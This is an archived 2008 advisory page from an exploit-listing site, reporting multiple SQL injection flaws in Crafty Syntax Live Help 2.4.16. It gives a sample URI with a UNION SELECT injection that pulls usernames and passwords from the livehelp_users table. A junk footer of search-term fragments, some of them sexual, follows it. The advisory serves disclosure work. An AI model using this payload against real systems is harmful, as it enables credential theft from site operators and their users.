about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities


Title Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities
Published 2008-08-25-12:00AM
Updated 2008-08-29-01:24AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team
Vulnerable  Crafty Syntax Live Help Crafty Syntax Live Help 2.4.16
Not Vulnerable  Crafty Syntax Live Help Crafty Syntax Live Help 2.15
Code  Attackers can use a browser to exploit these issues.The following example URI is available:http://www.example.com/is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat(username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 08:56:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
hollywoods Woltlab Li mambo Remo passive tm3 t447t mambo Remo news for c Show sexy Sex.india. apache 1.3 Privilege MOOBABES.C 2.6.8 kern banupriya t602t news for c nayan thar t253t CMS is Fre for vedios rxadmin mambo Remo mambo Remo xxxindian CMS is Fre hot+sex+in Www.sexyim mambo Remo pussypic DVD SEX mambo Remo Nude bolly mambo Remo search/exp coh CMS is Fre wulan guri news for c mambo Remo www.madala lesbin 200 /compo t346t www.colleg wordpres 2.2. adult sex CMS is Fre 1922